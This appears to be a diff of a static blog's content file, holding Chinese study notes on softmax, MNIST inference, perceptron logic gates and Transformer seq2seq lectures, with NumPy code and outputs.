    y_k &= \frac{\exp(a_k)}{\sum^n_{i=1}\exp(a_i)} &= \frac{C\exp(a_k)}{C\sum^n_{i=1}\exp(a_i)} \
    & &=\frac{\exp(a_k+\log C)}{\sum^n_{i=1}\exp(a_i+\log C)} \
    & &=\frac{\exp(a_k+C’)}{\sum^n_{i=1}\exp(a_i+C’)}
    \end{eqnarray}
    $$

    其中 $C$ 任意的常数,记 $\log C=C’$,这里的 $C’$ 可以使用任何值,但是为了防止溢出,一般会使用输入信号中的最大值。

    1
    2
    a = np.array([1010, 1000, 990])
    np.exp(a) / np.sum(np.exp(a))
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_15664\832863605.py:2: RuntimeWarning: overflow encountered in exp  np.exp(a) / np.sum(np.exp(a))C:\Users\gzjzx\AppData\Local\Temp\ipykernel_15664\832863605.py:2: RuntimeWarning: invalid value encountered in true_divide  np.exp(a) / np.sum(np.exp(a))array([nan, nan, nan])
    1
    2
    c = np.max(a)
    a - c
    array([  0, -10, -20])
    1
    np.exp(a-c) / np.sum(np.exp(a-c))
    array([9.99954600e-01, 4.53978686e-05, 2.06106005e-09])

    综上,我们可以像下面这样实现 softmax 函数。

    1
    2
    3
    4
    5
    6
    def softmax(a):
    c = np.max(a)
    exp_a = np.exp(a - c) # 溢出对策
    sum_exp_a = np.sum(exp_a)
    y = exp_a / sum_exp_a
    return y

    3.5.3softmax 函数的特征

    1
    2
    3
    a = np.array([0.3, 2.9, 4.0])
    y = softmax(a)
    y
    array([0.01821127, 0.24519181, 0.73659691])
    1
    np.sum(y)
    1.0
    • softmax 函数的输出是 0.0 到 1.0 之间的实数
    • softmax 函数的输出值的总和是 1

    3.5.4 输出层的神经元数量

    png

    输出层的神经元数量需要根据待解决的问题来决定。对于分类问题,输出层的神经元数量一般设定为类别的数量。

    3.6 手写数字识别

    假设学习已经全部结束,我们使用学习到的参数,先实现神经网络的“推理处理”。这个推理处理也称为神经网络的前向传播(forward propagation)

    3.6.1 MNIST 数据集

    MNIST 的图像数据是 28 像素× 28 像素的灰度图像(1 通道),各个像素的取值在 0 到 255 之间。每个图像数据都相应地标有“7”“2”“1”等标签。

    本书提供了便利的 Python 脚本 mnist.py,该脚本支持从下载 MNIST 数据
    集到将这些数据转换成 NumPy 数组等处理(mnist.py 在 dataset 目录下)。使用
    mnist.py 时,当前目录必须是 ch01、ch02、ch03、…、ch08 目录中的一个。使
    mnist.py 中的 load_mnist()函数,就可以按下述方式轻松读入 MNIST 数据。

    1
    2
    3
    4
    5
    6
    7
    import sys, os
    sys.path.append(os.pardir) # 为了导入父目录中的文件而进行的设定
    from dataset.mnist import load_mnist

    # 第一次调用会花费几分钟……
    # load_mnist 函数以“( 训练图像, 训练标签),( 测试图像,测试标签)”的形式返回读入的 MNIST 数据
    (x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)
    Downloading train-images-idx3-ubyte.gz ... DoneDownloading train-labels-idx1-ubyte.gz ... DoneDownloading t10k-images-idx3-ubyte.gz ... DoneDownloading t10k-labels-idx1-ubyte.gz ... DoneConverting train-images-idx3-ubyte.gz to NumPy Array ...DoneConverting train-labels-idx1-ubyte.gz to NumPy Array ...DoneConverting t10k-images-idx3-ubyte.gz to NumPy Array ...DoneConverting t10k-labels-idx1-ubyte.gz to NumPy Array ...DoneCreating pickle file ...Done!
    1
    2
    3
    4
    5
    # 输出各个数据的形状
    print(x_train.shape) # (60000, 784)
    print(t_train.shape) # (60000,)
    print(x_test.shape) # (10000, 784)
    print(t_test.shape) # (10000,)
    (60000, 784)(60000,)(10000, 784)(10000,)

    试着显示 MNIST 图像,同时也确认一下数据

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from dataset.mnist import load_mnist
    from PIL import Image
    import matplotlib.pyplot as plt


    def img_show(img):
    pil_img = Image.fromarray(np.uint8(img))
    pil_img.show()

    (x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)
    img = x_train[0]
    label = t_train[0]
    print(label) # 5

    print(img.shape) # (784,)
    img = img.reshape(28, 28) # 把图像的形状变成原来的尺寸
    print(img.shape) # (28, 28)
    plt.imshow(img, cmap='gray')
    5(784,)(28, 28)<matplotlib.image.AxesImage at 0x1f5a63afca0>

    png

    3.6.2 神经网络的推理处理

    对这个 MNIST 数据集实现神经网络的推理处理。
    神经网络的输入层有 784 个神经元,输出层有 10 个神经元。

    • 输入层的 784 这个数字来源于图像大小的 28 × 28 = 784

    • 输出层的 10 这个数字来源于 10 类别分类(数字 0 到 9,共 10 类别)

    • 这个神经网络有 2 个隐藏层,第 1 个隐藏层有 50 个神经元,第 2 个隐藏层有 100 个神经元。这个 50 和 100 可以设置为任何值。

    1
    2
    3
    4
    5
    6
    7
    def get_data():
    """
    获取数据
    """
    (x_train, t_train), (x_test, t_test) = \
    load_mnist(normalize=True, flatten=True, one_hot_label=False)
    return x_test, t_test

    将 normalize 设置成True后,函数内部会进行转换,将图像的各个像素值除以 255,使得数据的值在 0.0~1.0 的范围内。像这样把数据限定到某个范围内的处理称为正规化(normalization)。此外,对神经网络的输入数据进行某种既定的转换称为预处理(pre-processing)
    这里,作为对输入图像的一种预处理,我们进行了正规化。

    1
    2
    3
    4
    5
    6
    7
    8
    def init_network():
    """
    读入保存在 pickle 文件 sample_weight.pkl 中的学习到的权重参数
    这个文件中以字典变量的形式保存了权重和偏置参数
    """
    with open("sample_weight.pkl", 'rb') as f:
    network = pickle.load(f)
    return network
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    def predict(network, x):
    """
    前向传播
    """
    W1, W2, W3 = network['W1'], network['W2'], network['W3']
    b1, b2, b3 = network['b1'], network['b2'], network['b3']
    a1 = np.dot(x, W1) + b1
    z1 = sigmoid(a1)
    a2 = np.dot(z1, W2) + b2
    z2 = sigmoid(a2)
    a3 = np.dot(z2, W3) + b3
    y = softmax(a3)

    return y
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    import pickle

    x, t = get_data()
    network = init_network()

    accuracy_cnt = 0
    for i in range(len(x)):
    """
    用 for 语句逐一取出保存在 x 中的图像数据,用 predict()函数进行分类。
    predict()函数以 NumPy 数组的形式输出各个标签对应的概率。
    """
    y = predict(network, x[i])
    p = np.argmax(y) # 获取概率最高的元素的索引
    if p == t[i]:
    accuracy_cnt += 1

    print("Accuracy: " + str(float(accuracy_cnt) / len(x)))
    Accuracy:0.9352

    3.6.3 批处理

    输出刚才的神经网络的各层的权重的形状。

    1
    2
    3
    x, _ = get_data()
    network = init_network()
    W1, W2, W3 = network['W1'], network['W2'], network['W3']
    1
    x.shape
    (10000, 784)
    1
    x[0].shape
    (784,)
    1
    W1.shape
    (784, 50)
    1
    W2.shape
    (50, 100)
    1
    W3.shape
    (100, 10)

    从整体的处理流程来看,图 3-26 中,输入一个由 784 个元素(原本是一个 28 × 28 的二维数组)构成的一维数组后,输出一个有 10 个元素的一维数组。这是只输入一张图像数据时的处理流程。

    png

    现在我们来考虑打包输入多张图像的情形。比如,我们想用predict()
    函数一次性打包处理 100 张图像。为此,可以把 $\mathbf{x}$ 的形状改为 100 × 784,将
    100 张图像打包作为输入数据。

    png

    这种打包式的输入数据称为批(batch)。批有“捆”的意思,图像就如同纸币一样扎成一捆。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    x, t = get_data()
    network = init_network()

    batch_size = 100 # 批数量
    accuracy_cnt = 0

    for i in range(0, len(x), batch_size):
    """
    在 range()函数生成的列表的基础上,通过 x[i:i+batch_size]从输入数据中抽出批数据。
    x[i:i+batch_n]会取出从第 i 个到第 i+batch_n 个之间的数据。
    """
    x_batch = x[i:i+batch_size]
    y_batch = predict(network, x_batch)
    """
    参数 axis=1。这指定了在 100 × 10 的数组中,沿着第 1 维方向(以第 1 维为轴)
    找到值最大的元素的索引(第 0 维对应第 1 个维度)。
    """
    p = np.argmax(y_batch, axis=1) #
    accuracy_cnt += np.sum(p == t[i:i+batch_size])

    print("Accuracy:" + str(float(accuracy_cnt) / len(x)))
    Accuracy:0.9352

    3.7 小结

    • 神经网络中的激活函数使用平滑变化的 sigmoid 函数或 ReLU 函数。

    • 通过巧妙地使用 NumPy 多维数组,可以高效地实现神经网络。

    • 机器学习的问题大体上可以分为回归问题和分类问题。

    • 关于输出层的激活函数,回归问题中一般用恒等函数,分类问题中一般用 softmax 函数。

    • 分类问题中,输出层的神经元的数量设置为要分类的类别数。

    • 输入数据的集合称为批。通过以批为单位进行推理处理,能够实现高速的运算。

    ]]>
    @@ -8225,7 +8225,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-%E5%9F%BA%E4%BA%8EPython%E7%9A%84%E7%90%86%E8%AE%BA%E4%B8%8E%E5%AE%9E%E7%8E%B0-2-%E6%84%9F%E7%9F%A5%E6%9C%BA/ - 正文

    2.1 感知机是什么

    • 接收多个输入信号,输出一个信号。
    • 感知机的信号只有“流/ 不流”(1/0)两种取值。在本书中,0 对应“不传递信号”,1 对应“传递信号”。

    png

    一个接收两个输入信号的感知机的例子。$x_1$、$x_2$ 是输入信号,$y$ 是输出信号,$w_1$、$w_2$ 是权重($w$ 是 weight 的首字母)。图中的○称为“神经元”或者“节点”。输入信号被送往神经元时,会被分别乘以固定的权重($w_1x_1$、$w_2x_2$)。神经元会计算传送过来的信号的总和,只有当这个总和超过了某个界限值时,才会输出 1。这也称为“神经元被激活”。这里将这个界限值称为阈值,用符号 $\theta$ 表示。

    用数学式来表示:

    $$y=\left{\begin{matrix}0\quad(w_1x_1+w_2x_2\le\theta)\ 1\quad(w_1x_1+w_2x_2>\theta)\end{matrix}\right.$$

    感知机的多个输入信号都有各自固有的权重($w_1x_1$、$w_2x_2$),这些权重发挥着控制各个信号的重要性的作用。也就是说,权重越大,对应该权重的信号的重要性就越高。

    权重相当于电流里所说的电阻。电阻是决定电流流动难度的参数,
    电阻越低,通过的电流就越大。而感知机的权重则是值越大,通过
    的信号就越大。不管是电阻还是权重,在控制信号流动难度(或者流
    动容易度)这一点上的作用都是一样的。

    2.3 感知机的实现

    2.3.1 简单的实现

    def AND(x1, x2):
    """
    模拟一个 AND 门
    """
    w1, w2, theta = 0.5, 0.5, 0.7 # 接受参数 w1 = 0.5, w2 = 0.5, 阈值为 0.7
    tmp = x1 * w1 + x2 * w2
    if tmp <= theta:
    return 0
    elif tmp > theta:
    return 1
    print(AND(0, 0))
    print(AND(1, 0))
    print(AND(0, 1))
    print(AND(1, 1))
    0001

    2.3.2 导入权重和偏置

    导入权重和偏置, 把 $\theta$ 换成 $-b$:

    $$y=\left{\begin{matrix}0\quad (b+w_1x_1+w_2x_2\le 0)\1\quad(b+w_1x_1+w_2x_2>0)\end{matrix}\right.$$

    此处,$b$ 称为偏置,$w_1$ 和 $w_2$ 称为权重。感知机会计算输入信号和权重的乘积,然后加上偏置,如果这个值大于 0 则输出 1,否则输出 0。

    import numpy as np

    x = np.array([0, 1]) # 输入
    w = np.array([0.5, 0.5]) # 权重
    b = -0.7 # 偏置
    w * x
    array([0. , 0.5])
    np.sum(w * x)
    0.5
    np.sum(w * x) + b  # 大约为-0.2(由浮点小数造成的运算误差)
    -0.19999999999999996

    2.3.3 使用权重和偏置的实现

    def AND(x1, x2):
    x = np.array([x1, x2])
    w = np.array([0.5, 0.5])
    b = -0.7
    tmp = np.sum(w * x) + b
    if tmp <= 0:
    return 0
    else:
    return 1
    print(AND(0, 0))
    print(AND(1, 0))
    print(AND(0, 1))
    print(AND(1, 1))
    0001

    偏置的值决定了神经元被激活的容易程度。这里我们将 $w_1$ 和 $w_2$ 称为权重,将 $b$ 称为偏置,但是根据上下文,有时也会将 $b$、$w_1$、$w_2$ 这些参数统称为权重(将 1 也视为输入,$b$ 是调整神经元被激活的容易程度(输出信号为 1 的程度)的参数)。

    def NAND(x1, x2):
    """
    模拟一个非门
    """
    x = np.array([x1, x2])
    w = np.array([-0.5, -0.5]) # 仅权重和偏置与 AND 不同!
    b = 0.7
    tmp = np.sum(w * x) + b
    if tmp <= 0:
    return 0
    else:
    return 1
    print(NAND(0, 0))
    print(NAND(1, 0))
    print(NAND(0, 1))
    print(NAND(1, 1))
    1110
    def OR(x1, x2):
    """
    模拟一个或门
    """
    x = np.array([x1, x2])
    w = np.array([0.5, 0.5]) # 仅权重和偏置与 AND 不同!
    b = -0.2
    tmp = np.sum(w * x) + b
    if tmp <= 0:
    return 0
    else:
    return 1
    print(OR(0, 0))
    print(OR(1, 0))
    print(OR(0, 1))
    print(OR(1, 1))
    0111

    2.4 感知机的局限性

    单层感知机无法解决异或问题。

    2.5 多层感知机

    2.5.1 已有门电路的组合

    png

    png

    2.5.2 异或门的实现

    def XOR(x1, x2):
    """
    使用之前定义的 AND 函数、NAND 函数、OR 函数,实现 XOR 门。
    """
    s1 = NAND(x1, x2)
    s2 = OR(x1, x2)
    y = AND(s1, s2)
    return y
    print(XOR(0, 0))
    print(XOR(1, 0))
    print(XOR(0, 1))
    print(XOR(1, 1))
    0110

    实际上,与门、或门是单层感知机,而异或门是 2 层感知机。叠加了多层的感知机也称为多层感知机(multi-layered perceptron)

    png

    上图的感知机总共由 3 层构成,但是因为拥有权重的层实质上只有 2 层(第 0 层和第 1 层之间,第 1 层和第 2 层之间),所以称为“2 层感知机”。不过,有的文献认为上图的感知机是由 3 层构成的,因而将其称为“3 层感知机”。

    2.7 小结

    • 感知机是具有输入和输出的算法。给定一个输入后,将输出一个既
      定的值。
    • 感知机将权重和偏置设定为参数。
    • 使用感知机可以表示与门和或门等逻辑电路。
    • 异或门无法通过单层感知机来表示。
    • 使用 2 层感知机可以表示异或门。
    • 单层感知机只能表示线性空间,而多层感知机可以表示非线性空间。
    • 多层感知机(在理论上)可以表示计算机。
    ]]>
    + 正文

    2.1 感知机是什么

    • 接收多个输入信号,输出一个信号。
    • 感知机的信号只有“流/ 不流”(1/0)两种取值。在本书中,0 对应“不传递信号”,1 对应“传递信号”。

    png

    一个接收两个输入信号的感知机的例子。$x_1$、$x_2$ 是输入信号,$y$ 是输出信号,$w_1$、$w_2$ 是权重($w$ 是 weight 的首字母)。图中的○称为“神经元”或者“节点”。输入信号被送往神经元时,会被分别乘以固定的权重($w_1x_1$、$w_2x_2$)。神经元会计算传送过来的信号的总和,只有当这个总和超过了某个界限值时,才会输出 1。这也称为“神经元被激活”。这里将这个界限值称为阈值,用符号 $\theta$ 表示。

    用数学式来表示:

    $$y=\left{\begin{matrix}0\quad(w_1x_1+w_2x_2\le\theta)\ 1\quad(w_1x_1+w_2x_2>\theta)\end{matrix}\right.$$

    感知机的多个输入信号都有各自固有的权重($w_1x_1$、$w_2x_2$),这些权重发挥着控制各个信号的重要性的作用。也就是说,权重越大,对应该权重的信号的重要性就越高。

    权重相当于电流里所说的电阻。电阻是决定电流流动难度的参数,
    电阻越低,通过的电流就越大。而感知机的权重则是值越大,通过
    的信号就越大。不管是电阻还是权重,在控制信号流动难度(或者流
    动容易度)这一点上的作用都是一样的。

    2.3 感知机的实现

    2.3.1 简单的实现

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    def AND(x1, x2):
    """
    模拟一个 AND 门
    """
    w1, w2, theta = 0.5, 0.5, 0.7 # 接受参数 w1 = 0.5, w2 = 0.5, 阈值为 0.7
    tmp = x1 * w1 + x2 * w2
    if tmp <= theta:
    return 0
    elif tmp > theta:
    return 1
    1
    2
    3
    4
    print(AND(0, 0))
    print(AND(1, 0))
    print(AND(0, 1))
    print(AND(1, 1))
    0001

    2.3.2 导入权重和偏置

    导入权重和偏置, 把 $\theta$ 换成 $-b$:

    $$y=\left{\begin{matrix}0\quad (b+w_1x_1+w_2x_2\le 0)\1\quad(b+w_1x_1+w_2x_2>0)\end{matrix}\right.$$

    此处,$b$ 称为偏置,$w_1$ 和 $w_2$ 称为权重。感知机会计算输入信号和权重的乘积,然后加上偏置,如果这个值大于 0 则输出 1,否则输出 0。

    1
    2
    3
    4
    5
    6
    import numpy as np

    x = np.array([0, 1]) # 输入
    w = np.array([0.5, 0.5]) # 权重
    b = -0.7 # 偏置
    w * x
    array([0. , 0.5])
    1
    np.sum(w * x)
    0.5
    1
    np.sum(w * x) + b  # 大约为-0.2(由浮点小数造成的运算误差)
    -0.19999999999999996

    2.3.3 使用权重和偏置的实现

    1
    2
    3
    4
    5
    6
    7
    8
    9
    def AND(x1, x2):
    x = np.array([x1, x2])
    w = np.array([0.5, 0.5])
    b = -0.7
    tmp = np.sum(w * x) + b
    if tmp <= 0:
    return 0
    else:
    return 1
    1
    2
    3
    4
    print(AND(0, 0))
    print(AND(1, 0))
    print(AND(0, 1))
    print(AND(1, 1))
    0001

    偏置的值决定了神经元被激活的容易程度。这里我们将 $w_1$ 和 $w_2$ 称为权重,将 $b$ 称为偏置,但是根据上下文,有时也会将 $b$、$w_1$、$w_2$ 这些参数统称为权重(将 1 也视为输入,$b$ 是调整神经元被激活的容易程度(输出信号为 1 的程度)的参数)。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    def NAND(x1, x2):
    """
    模拟一个非门
    """
    x = np.array([x1, x2])
    w = np.array([-0.5, -0.5]) # 仅权重和偏置与 AND 不同!
    b = 0.7
    tmp = np.sum(w * x) + b
    if tmp <= 0:
    return 0
    else:
    return 1
    1
    2
    3
    4
    print(NAND(0, 0))
    print(NAND(1, 0))
    print(NAND(0, 1))
    print(NAND(1, 1))
    1110
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    def OR(x1, x2):
    """
    模拟一个或门
    """
    x = np.array([x1, x2])
    w = np.array([0.5, 0.5]) # 仅权重和偏置与 AND 不同!
    b = -0.2
    tmp = np.sum(w * x) + b
    if tmp <= 0:
    return 0
    else:
    return 1
    1
    2
    3
    4
    print(OR(0, 0))
    print(OR(1, 0))
    print(OR(0, 1))
    print(OR(1, 1))
    0111

    2.4 感知机的局限性

    单层感知机无法解决异或问题。

    2.5 多层感知机

    2.5.1 已有门电路的组合

    png

    png

    2.5.2 异或门的实现

    1
    2
    3
    4
    5
    6
    7
    8
    def XOR(x1, x2):
    """
    使用之前定义的 AND 函数、NAND 函数、OR 函数,实现 XOR 门。
    """
    s1 = NAND(x1, x2)
    s2 = OR(x1, x2)
    y = AND(s1, s2)
    return y
    1
    2
    3
    4
    print(XOR(0, 0))
    print(XOR(1, 0))
    print(XOR(0, 1))
    print(XOR(1, 1))
    0110

    实际上,与门、或门是单层感知机,而异或门是 2 层感知机。叠加了多层的感知机也称为多层感知机(multi-layered perceptron)

    png

    上图的感知机总共由 3 层构成,但是因为拥有权重的层实质上只有 2 层(第 0 层和第 1 层之间,第 1 层和第 2 层之间),所以称为“2 层感知机”。不过,有的文献认为上图的感知机是由 3 层构成的,因而将其称为“3 层感知机”。

    2.7 小结

    • 感知机是具有输入和输出的算法。给定一个输入后,将输出一个既
      定的值。
    • 感知机将权重和偏置设定为参数。
    • 使用感知机可以表示与门和或门等逻辑电路。
    • 异或门无法通过单层感知机来表示。
    • 使用 2 层感知机可以表示异或门。
    • 单层感知机只能表示线性空间,而多层感知机可以表示非线性空间。
    • 多层感知机(在理论上)可以表示计算机。
    ]]>
    @@ -8379,7 +8379,7 @@ /posts/ML-%E6%9D%8E%E5%AE%8F%E6%AF%85-Lecture%205-Sequence%20to%20sequence/ - Preparation

    ##【機器學習 2021】Transformer -上-

    Transformer 是 2017 年引入的深度学习模型,主要用于自然语言处理领域。与循环神经网络一样,Transformers 旨在处理顺序数据(例如自然语言),以执行翻译和文本摘要等任务。但是,与 RNN 不同,Transformers 不需要按顺序处理顺序数据。

    png

    Seq2seq 问题:输入一个序列,输出一个序列,输出序列的长度由模型决定。

    • Speech Recognition:输入一段语音 T,输出对应的文字 N。
    • Machine Translation:输出一段文字 N,输出另一种语言的文字 N’。
    • Speech Translation:输入一段语音(这段语音使用的语言可能没有对应的文字),输出另一种语言的文字。
      • 对于有文字的语言,可以将 Speech Recognition 和 Machine Translation 结合成 Speech Translation,但是没有文字的语言就不行。

    png

    ​ 尝试使用 1500 小时的乡土剧(台语声音,中文字幕)做数据集,让机器试着听台语输出中文。

    png

    ​ 不考虑训练集中 BGM、噪音、翻译文本的噪声、台语的口音等的因素。

    png

    ​ 最后也能得到差强人意的效果。

    png

    ​ Taiwanese Speech Synthetic:语音辨识反过来:语言合成,输入文本,输出台语的项目。

    png

    ​ Seq2seq model 用在聊天模型中。

    png

    ​ 把所有对话问题(各式各样的 NLP 问题)当作 QA 问题,用 seq2seq 模型解决。输入 question,context,输出 answer。

    png

    ​ 将 seq2seq 模型用在文法分析 Syntactic Parsing 中:输入一句话,输出这句话的语法成分(将语法成分看作用序列表示的一棵树)。

    png

    png

    ​ 用在多标签分类问题。(同一个东西可能属于不同分类)输入一个文章,输出几个 class(由机器及自己决定)

    png

    ​ 用在目标检测(看似没有关系,但是可以用 seq2seq 硬做)

    png

    ​ 在 2014 年,就提出了 Seq2seq 模型(不过时间比较久远,模型比较旧):[1409.3215] Sequence to Sequence Learning with Neural Networks (arxiv.org)。由两个 RNN 分别组成了 Encoder、Decoder,可以应用于机器翻译。

    png

    ​ 今天典型的 seq2deq model:Transformer [1706.03762] Attention Is All You Need (arxiv.org)

    一般的 seq2seq model 会分成两块:Encoder(负责处理 input 的 seq)、Decoder(决定输出什么样的 seq)

    Encoder

    png

    png

    ​ 在 seq2seq 模型中的 Encoder 要做的事情就是 输入一排向量,输出另一排向量。能实现输入一排向量,输出一排向量功能的模型有 Self-attention、CNN 和 RNN 等模型,而 Transformer 中用到的则是 Multi-Head attention 模型

    png

    ​ Transformer 中有 N 个 Block,每个 Block 中包含了 Multi-Head Attention 和 Fully Connected 的 Feed Forward Network。

    • 先做一个 self-attention,输入一排向量,经过 self-attention 考虑整个 sequence 的信息后,输出另外一排向量。
    • 接下来将输出的这一排向量输入到 fully connected 的前馈网络中,得到处理后的向量,就是 Block 的输出。

    png

    ​ Transformer 引入了 residual connection,直接把 input 的 $a$ 和 output 的 $b$ 加起来得到新的 vector,再进行 layer normalization,得到 self-attention 的输出(FC 网络的输入)。

    ​ 在 fully connected 中也增加了同样的 residual 网络结构,FC 网络的输出先直接加上它对应的输入,然后经过 layer normalization 之后才是 FC 网络最终的输出。

    Layer Norm:

    $$x’_i=\frac{x’_i-m}{\sigma}$$

    png

    ​ BERT 就使用了 transformer Eecoder。

    Encoder 总结

    • 在将输入向量进行 self-attention 之前,先加上 Positional Encoding,也就是输入向量中的位置信息。

    • Multi-Head Attention:进行 Multi-Head 的 self-attention 处理得到输出向量。

    • Add & Norm (residual & layer normalization): 也就是将 self-attention 的输出加上它对应的输入然后对其进行 Layer Normalization。

    • Feed Forward:将上一层的输出输入到 fully connected Network 中,将得到的输出向量和对应的输入向量同样经过 residual & layer normalization 操作后得到该 block 的最终输出。

    • 将这个 block 重复 n 次。

    png

    尝试对原始的 transformer 的改进:[2002.04745] On Layer Normalization in the Transformer Architecture (arxiv.org)

    为什么说要用 layer normalization 而不是 batch normalization:[2003.07845] PowerNorm: Rethinking Batch Normalization in Transformers (arxiv.org)

    ##【機器學習 2021】Transformer -下-

    Decoder 分为 Auto regressive(AT)和 Non-Auto regressive(NAT)两种。其中 AT 应用范围更为广泛一些。

    Decoder-Autoregressive (AT)

    png

    png

    ​ 以 Speech Recognition 为例,从一段音频文件转换为文字序列。先由 Encoder 将这段音频变成一排 vector,再由 Decoder 将这排 vector 变成一段文字。每一个文字(Token)都用一个独热编码的向量表示(如果是英文,会更复杂)。BEGIN 和 END 被作为特殊的 Token。

    • 在 Encoder 完成之后,将其输出作为一个输入喂到 Decoder 中。

    • 同时,输入一个 special token:BEGIN 表示开始工作。

    • Decoder 结合这两个输入,输出一个经过 softmax 处理后的长度为 Vocabulary Size 的输出向量(是个概率分布),该向量中每一个中文字都对应一个数值,数值最大的中文字为最终输出的中文字,下图中,输出的结果是“机”。

    png

    ​ 接下来将“机”作为 Decoder 的输入,输出”器“,依次法得到”学“和”习“。(Decoder 会把自己的输入当作接下来的输出)

    png

    ​ Decoder 的结构。

    png

    ​ Encoder 与 Decoder 相比,每一个 block 中 Decoder 比 Encoder 多了中间的一个 Multi-Head Attention,同时第一个自注意力机制使用的是 Masked Multi-Head Attention
    png

    Masked Self-attention 与 Self-attention 的不同

    ​ Masked Self-attention 的计算顺序其实是和 Decoder 的串行计算顺序相对应的,以上图中计算 $b^2$ 为例:在计算 $b^2$ 的时候,和原来的 Self-attention 考虑所有输入信息 $[a1,a2,a3,a4]$ 不同,Masked Self-attention 考虑 $[a1,a2]$ , 因为此时的 $[a3,a4]$ 还没有计算出来。

    Why masked?

    ​ Encoder 是知道所有的 $a$,所以使用 Self-attention,而 Decoder 需要知道前一个的输出作为输入,不知道所有的 $a$(只能考虑左边的东西,不能考虑右边的东西),所以使用 Masked Multi attention。

    png

    png

    Decoder 无法知道最终输出的长度?

    ​ 加入 special token:STOP,机器就会停止。

    png

    ​ 要让机器识别出“机器学习”后,会输出 END。

    Decoder-Non-Autoregressive (NAT)

    png

    png

    ​ 与 AT 不同的是,NAT 并不使用之前时刻的输出,而是一次输入一组 special token。

    • How to decide the output length for NAT Decoder?

      • Another predictor for output length(由其他部分决定输出长度)

      • Output a very long sequence, ignore tokens after END

    • Advantage:

      • parallel
        • AT 一次输出一个 vector(因为上一个输出又作为下一个输入),无法并行处理。而 NAT 可以并行处理,NAT 速度比 AT 更快,在有 self-attention 之前,RNN 和 LSTM 是不能设计 NAT 的。
      • controllable output length
        • 比如在语音合成 (TTS) 任务中,把 Eecoder 的输出送入一个 Classifier,预测 Decoder 输出 sequence 长度。通过改变这个 Classifier 预测的长度,可以调整生成语音的语速。例如,设置输出 sequence 长度 x2,语速就可以慢一倍。
    • NAT is usually worse than AT (why? Multi-modality 多模态的问题)

    了解更多 NAT:https://youtu.be/jvyKmU40M3c

    Encoder-Decoder

    png

    png

    ​ Encoder 与 Decoder 联系起来的部分:Cross attention。两个输入 $(k,v)$ 来自 Encoder,一个输入 $q$ 来自 Decoder。它计算的是 Encoder 的输出与当前 vector 的 cross attention。

    png

    ​ 用 Decoder 中 Self-attention 层的输出 vector 生成 $q$,与由 Encoder 最后一层输出 sequence 产生的 $(k,v)$ 做运算。

    png

    ​ Cross Attention 实际的展示:Listen, attend and spell: A neural network for large vocabulary conversational speech recognition

    ​ 并不是 transformer,说明先有 cross attention 机制后才有的 self-attention 机制。

    png

    ​ 试想一下,如果你要做一个演讲,虽然记了演讲内容,但还是会担心一上台紧张忘词。怎么办呢?可以把提纲写在卡片上,演讲中看上一眼,就知道接下来要讲什么了。我觉得 cross attention 的作用就有点像这个小卡片,因为它看过整个 sequence,可以给 Decoder 提示信息。

    ​ cross attention 在早期的 Seq2seq 模型论文中就已经出现,是 Seq2seq 的重要单元。看到 seq2seq model with attentionYannic Kilcher 大神的论文解读视频 介绍,早期 Seq2seq 模型的 Eecoder 和 Decoder 是用 RNN,attention 用在 cross attention 单元。本来 Decoder 只能利用 Eecoder RNN 最后一个时刻的 hidden state,用了 cross attention 之后,之前时刻的 hidden state 也可以看。哪个时刻的 hidden state 对当前 Decoder 输出最相关 (attention),重点看这个 hidden state,这样模型的性能更好。而 Transformer 架构干脆把 Eecoder 和 Decoder 也全部用 attention 来做 (Self-attention),正如论文标题所言 “Attention is all you need”。

    ​ 你可能会有疑问,Decoder 有很多层 self-attention,每一层 self-attention 的输出都是与 Eecoder 最后的输出 sequence 做 cross attention 吗?可以有不同的设计吗?Transformer 论文中是这样设计,但是也可以用不同的设计,现在已经有一些这方面的研究和实验。

    ​ 不同的 Cross Attention 连接方式:[2005.08081] Rethinking and Improving Natural Language Generation with Layer-Wise Multi-View Decoding (arxiv.org)

    Training

    png

    png

    ​ Decoder 的输出 (output) 是一个概率分布,label 是 one-hot vector,优化的目标就是使 label 与 Decoder output 之间的 cross entropy 最小。这其实是一个分类问题。

    png

    ​ Decoder 中,前一个输出又作为下一个输入。使用 Teacher Forcing 方法,Decoder 输入用的是 ground truth value(在训练的时候会给 Decoder 看正确答案)。

    ​ 测试的时候没有正确答案?可能会有 mis match 的问题。

    Copy Mechanism

    png

    ​ Copy Mechanism 指在文本生成领域,生成的输出是输入序列元素的复制或者指向。该机制最早由 Vinyals et al.(2015)在 Pointer Network 中提出,所以有时也被称为 Pointer Mechanism 指针机制。

    ​ 有些情况,不需要对输入做改动,比如翻译人名地名,聊天机器人(chat-bot),摘要 (summarization) 等,可以直接复制一部分输入内容。

    ​ 具体的方法:

    • Pointer Network
    • Copy network

    png

    应用:给机器读一篇文章,让机器输出一篇文章的摘要。

    png

    Seq2seq model 如何做到 Copy Mechanism?

    Guided Attention

    png

    ​ 举了一个语音合成 (TTS) 的例子,机器一次说四遍“发财”这个词时,说得挺好,还有抑扬顿挫之感。一次说三遍或两遍“发财”也正常。但是,一次说一遍“发财”时,不知怎的,只有一个音“财”(也许机器不知道怎么处理非常短的句子)。

    png

    ​ 从这个例子可以看到,在处理语音识别 (speech recognition) 或语音合成 (TTS) 等任务时,我们不希望漏掉其中的任何一段内容,Guided Attention 正是要满足这个要求。而 chat-bot, summary 一类的应用在这方面的要求就宽松得多。

    ​ Guided Attention 是让 attention 的计算按照一定顺序来进行。比如在做语音合成时,attention 的计算应该从左向右推进,如下图中前三幅图所示。如果 attention 的计算时顺序错乱,如下图中后三幅图所示,那就说明出了错误。具体方法:Monotonic Attention, Location-aware attention。

    png

